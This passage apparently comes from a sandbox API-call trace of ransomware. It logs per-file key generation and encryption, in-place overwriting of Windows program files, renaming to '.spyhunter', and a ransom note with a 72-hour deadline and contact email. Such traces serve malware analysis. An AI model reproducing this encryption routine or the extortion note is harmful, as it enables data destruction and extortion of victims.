oledb\\10\\msmdlocal.dll.spyhunter")) returned 1 [0166.962] GetProcessHeap () returned 0x2c0000 [0166.962] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0166.962] GetProcessHeap () returned 0x2c0000 [0166.962] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0166.962] GetProcessHeap () returned 0x2c0000 [0166.962] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ece830 | out: hHeap=0x2c0000) returned 1 [0166.962] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e728 | out: pbBuffer=0x57e728) returned 1 [0166.962] GetProcessHeap () returned 0x2c0000 [0166.962] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0166.962] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e720*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e720*=0x30) returned 1 [0166.962] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql2000.xsl" (normalized: "c:\\program files (x86)\\microsoft analysis services\\as oledb\\10\\cartridges\\sql2000.xsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0166.963] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql2000.xsl") returned 89 [0166.963] StrStrW (lpFirst="sql2000.xsl", lpSrch=".txt") returned 0x0 [0166.963] GetProcessHeap () returned 0x2c0000 [0166.963] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0166.963] ReadFile (in: hFile=0xa0, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e6e4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x57e6e4*=0x2800, lpOverlapped=0x0) returned 1 [0167.031] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0167.031] WriteFile (in: hFile=0xa0, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57e6e4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x57e6e4*=0x2800, lpOverlapped=0x0) returned 1 [0167.031] GetProcessHeap () returned 0x2c0000 [0167.031] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0167.032] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0167.032] WriteFile (in: hFile=0xa0, lpBuffer=0x57e724*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e6e4, lpOverlapped=0x0 | out: lpBuffer=0x57e724*, lpNumberOfBytesWritten=0x57e6e4*=0x4, lpOverlapped=0x0) returned 1 [0167.078] WriteFile (in: hFile=0xa0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e6e4, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x57e6e4*=0x30, lpOverlapped=0x0) returned 1 [0167.078] CloseHandle (hObject=0xa0) returned 1 [0167.078] GetProcessHeap () returned 0x2c0000 [0167.078] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0167.078] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql2000.xsl.spyhunter") returned 99 [0167.078] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql2000.xsl" (normalized: "c:\\program files (x86)\\microsoft analysis services\\as oledb\\10\\cartridges\\sql2000.xsl"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql2000.xsl.spyhunter" (normalized: "c:\\program files (x86)\\microsoft analysis services\\as oledb\\10\\cartridges\\sql2000.xsl.spyhunter")) returned 1 [0167.080] GetProcessHeap () returned 0x2c0000 [0167.080] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0167.080] GetProcessHeap () returned 0x2c0000 [0167.080] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0167.080] GetProcessHeap () returned 0x2c0000 [0167.080] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e5eac0 | out: hHeap=0x2c0000) returned 1 [0167.080] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e720 | out: pbBuffer=0x57e720) returned 1 [0167.080] GetProcessHeap () returned 0x2c0000 [0167.080] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0167.080] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e718*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e718*=0x30) returned 1 [0167.080] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as80.xsl" (normalized: "c:\\program files (x86)\\microsoft analysis services\\as oledb\\10\\cartridges\\as80.xsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0167.081] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as80.xsl") returned 86 [0167.081] StrStrW (lpFirst="as80.xsl", lpSrch=".txt") returned 0x0 [0167.081] GetProcessHeap () returned 0x2c0000 [0167.081] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0167.081] ReadFile (in: hFile=0xa0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e6dc, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x57e6dc*=0x2800, lpOverlapped=0x0) returned 1 [0167.249] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0167.249] WriteFile (in: hFile=0xa0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57e6dc, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x57e6dc*=0x2800, lpOverlapped=0x0) returned 1 [0167.249] GetProcessHeap () returned 0x2c0000 [0167.249] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0167.249] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0167.249] WriteFile (in: hFile=0xa0, lpBuffer=0x57e71c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e6dc, lpOverlapped=0x0 | out: lpBuffer=0x57e71c*, lpNumberOfBytesWritten=0x57e6dc*=0x4, lpOverlapped=0x0) returned 1 [0167.401] WriteFile (in: hFile=0xa0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e6dc, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x57e6dc*=0x30, lpOverlapped=0x0) returned 1 [0167.401] CloseHandle (hObject=0xa0) returned 1 [0167.401] GetProcessHeap () returned 0x2c0000 [0167.401] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0167.401] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as80.xsl.spyhunter") returned 96 [0167.401] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as80.xsl" (normalized: "c:\\program files (x86)\\microsoft analysis services\\as oledb\\10\\cartridges\\as80.xsl"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as80.xsl.spyhunter" (normalized: "c:\\program files (x86)\\microsoft analysis services\\as oledb\\10\\cartridges\\as80.xsl.spyhunter")) returned 1 [0167.402] GetProcessHeap () returned 0x2c0000 [0167.402] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0167.402] GetProcessHeap () returned 0x2c0000 [0167.403] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0167.403] GetProcessHeap () returned 0x2c0000 [0167.403] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eca0c8 | out: hHeap=0x2c0000) returned 1 [0167.403] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e720 | out: pbBuffer=0x57e720) returned 1 [0167.403] GetProcessHeap () returned 0x2c0000 [0167.403] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0167.403] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e718*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e718*=0x30) returned 1 [0167.403] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\SystemV\\YST9" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\systemv\\yst9"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0167.405] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\SystemV\\YST9") returned 56 [0167.405] StrStrW (lpFirst="YST9", lpSrch=".txt") returned 0x0 [0167.405] GetProcessHeap () returned 0x2c0000 [0167.405] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0167.405] ReadFile (in: hFile=0xa0, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e6dc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x57e6dc*=0x1b, lpOverlapped=0x0) returned 1 [0167.406] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffffe5, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0167.406] WriteFile (in: hFile=0xa0, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x1b, lpNumberOfBytesWritten=0x57e6dc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x57e6dc*=0x1b, lpOverlapped=0x0) returned 1 [0167.406] GetProcessHeap () returned 0x2c0000 [0167.406] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0167.406] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0167.406] WriteFile (in: hFile=0xa0, lpBuffer=0x57e71c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e6dc, lpOverlapped=0x0 | out: lpBuffer=0x57e71c*, lpNumberOfBytesWritten=0x57e6dc*=0x4, lpOverlapped=0x0) returned 1 [0167.406] WriteFile (in: hFile=0xa0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e6dc, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x57e6dc*=0x30, lpOverlapped=0x0) returned 1 [0167.407] CloseHandle (hObject=0xa0) returned 1 [0167.407] GetProcessHeap () returned 0x2c0000 [0167.407] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0167.407] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\SystemV\\YST9.spyhunter") returned 66 [0167.407] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\SystemV\\YST9" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\systemv\\yst9"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\SystemV\\YST9.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\systemv\\yst9.spyhunter")) returned 1 [0167.408] GetProcessHeap () returned 0x2c0000 [0167.408] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0167.408] GetProcessHeap () returned 0x2c0000 [0167.408] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0167.408] GetProcessHeap () returned 0x2c0000 [0167.408] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ea8278 | out: hHeap=0x2c0000) returned 1 [0167.408] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e718 | out: pbBuffer=0x57e718) returned 1 [0167.408] GetProcessHeap () returned 0x2c0000 [0167.408] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0167.408] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e710*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e710*=0x30) returned 1 [0167.408] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\SystemV\\PST8PDT" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\systemv\\pst8pdt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0167.409] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\SystemV\\PST8PDT") returned 59 [0167.409] StrStrW (lpFirst="PST8PDT", lpSrch=".txt") returned 0x0 [0167.409] GetProcessHeap () returned 0x2c0000 [0167.409] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0167.409] ReadFile (in: hFile=0xa0, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e6d4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x57e6d4*=0x8f0, lpOverlapped=0x0) returned 1 [0167.458] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xfffff710, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0167.458] WriteFile (in: hFile=0xa0, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x8f0, lpNumberOfBytesWritten=0x57e6d4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x57e6d4*=0x8f0, lpOverlapped=0x0) returned 1 [0167.458] GetProcessHeap () returned 0x2c0000 [0167.458] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0167.458] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0167.458] WriteFile (in: hFile=0xa0, lpBuffer=0x57e714*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e6d4, lpOverlapped=0x0 | out: lpBuffer=0x57e714*, lpNumberOfBytesWritten=0x57e6d4*=0x4, lpOverlapped=0x0) returned 1 [0167.458] WriteFile (in: hFile=0xa0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e6d4, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x57e6d4*=0x30, lpOverlapped=0x0) returned 1 [0167.458] CloseHandle (hObject=0xa0) returned 1 [0167.459] GetProcessHeap () returned 0x2c0000 [0167.459] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0167.459] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\SystemV\\PST8PDT.spyhunter") returned 69 [0167.459] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\SystemV\\PST8PDT" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\systemv\\pst8pdt"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\SystemV\\PST8PDT.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\systemv\\pst8pdt.spyhunter")) returned 1 [0167.481] GetProcessHeap () returned 0x2c0000 [0167.481] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0167.481] GetProcessHeap () returned 0x2c0000 [0167.481] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0167.481] GetProcessHeap () returned 0x2c0000 [0167.481] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ea81b8 | out: hHeap=0x2c0000) returned 1 [0167.481] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0167.483] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0167.483] WriteFile (in: hFile=0xa0, lpBuffer=0x57e64b*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x57e774, lpOverlapped=0x0 | out: lpBuffer=0x57e64b*, lpNumberOfBytesWritten=0x57e774*=0x127, lpOverlapped=0x0) returned 1 [0167.483] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0167.483] WriteFile (in: hFile=0xa0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x57e774, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x57e774*=0x2ac, lpOverlapped=0x0) returned 1 [0167.484] CloseHandle (hObject=0xa0) returned 1 [0167.484] GetProcessHeap () returned 0x2c0000 [0167.484] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e7dc08 | out: hHeap=0x2c0000) returned 1 [0167.484] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e710 | out: pbBuffer=0x57e710) returned 1 [0167.484] GetProcessHeap () returned 0x2c0000 [0167.484] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0167.484] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e708*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e708*=0x30) returned 1 [0167.484] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Wallis" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\wallis"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0167.485] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Wallis") returned 58 [0167.486] StrStrW (lpFirst="Wallis", lpSrch=".txt") returned 0x0 [0167.486] GetProcessHeap () returned 0x2c0000 [0167.486] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0167.486] ReadFile (in: hFile=0xa0, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e6cc, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x57e6cc*=0x41, lpOverlapped=0x0) returned 1 [0167.487] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffffbf, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0167.487] WriteFile (in: hFile=0xa0, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x41, lpNumberOfBytesWritten=0x57e6cc, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x57e6cc*=0x41, lpOverlapped=0x0) returned 1 [0167.487] GetProcessHeap () returned 0x2c0000 [0167.487] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0167.487] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0167.487] WriteFile (in: hFile=0xa0, lpBuffer=0x57e70c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e6cc, lpOverlapped=0x0 | out: lpBuffer=0x57e70c*, lpNumberOfBytesWritten=0x57e6cc*=0x4, lpOverlapped=0x0) returned 1 [0167.487] WriteFile (in: hFile=0xa0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e6cc, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x57e6cc*=0x30, lpOverlapped=0x0) returned 1 [0167.487] CloseHandle (hObject=0xa0) returned 1 [0167.487] GetProcessHeap () returned 0x2c0000 [0167.487] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0167.487] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Wallis.spyhunter") returned 68 [0167.487] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Wallis" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\wallis"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Wallis.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\wallis.spyhunter")) returned 1 [0167.490] GetProcessHeap () returned 0x2c0000 [0167.490] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0167.490] GetProcessHeap () returned 0x2c0000 [0167.490] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0167.490] GetProcessHeap () returned 0x2c0000 [0167.490] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec43c0 | out: hHeap=0x2c0000) returned 1 [0167.490] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e710 | out: pbBuffer=0x57e710) returned 1 [0167.490] GetProcessHeap () returned 0x2c0000 [0167.490] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0167.490] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e708*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e708*=0x30) returned 1 [0167.490] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Wake" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\wake"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0167.491] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Wake") returned 56 [0167.491] StrStrW (lpFirst="Wake", lpSrch=".txt") returned 0x0 [0167.491] GetProcessHeap () returned 0x2c0000 [0167.491] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0167.491] ReadFile (in: hFile=0xa0, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e6cc, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x57e6cc*=0x41, lpOverlapped=0x0) returned 1 [0167.492] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffffbf, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0167.492] WriteFile (in: hFile=0xa0, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x41, lpNumberOfBytesWritten=0x57e6cc, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x57e6cc*=0x41, lpOverlapped=0x0) returned 1 [0167.492] GetProcessHeap () returned 0x2c0000 [0167.493] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0167.493] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0167.493] WriteFile (in: hFile=0xa0, lpBuffer=0x57e70c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e6cc, lpOverlapped=0x0 | out: lpBuffer=0x57e70c*, 